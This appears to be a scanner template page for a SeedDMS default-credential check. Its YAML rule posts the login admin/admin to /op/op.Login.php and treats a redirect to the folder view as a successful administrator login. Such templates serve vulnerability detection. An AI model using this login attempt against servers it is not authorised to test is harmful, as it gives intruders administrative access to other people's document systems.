seeddms-default-password: SeedDMS Default Credential

2025-08-01 SeedDMS PoC Public

Description

app="SeedDMS:-Sign-in"

PoC

id: seeddms-default-password

info:
  name: SeedDMS Default Credential
  author: alifathi-h1
  severity: high
  verified: true
  description: |-
    app="SeedDMS:-Sign-in"
  tags: default-login,seeddms
  created: 2023/10/30

rules:
  r0:
    request:
      method: POST
      path: /op/op.Login.php
      body: login=admin&pwd=admin&lang=
    expression: response.status == 302 && response.headers["location"].contains("/out/out.ViewFolder.php")
expression: r0()

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

References

Related Vulnerabilities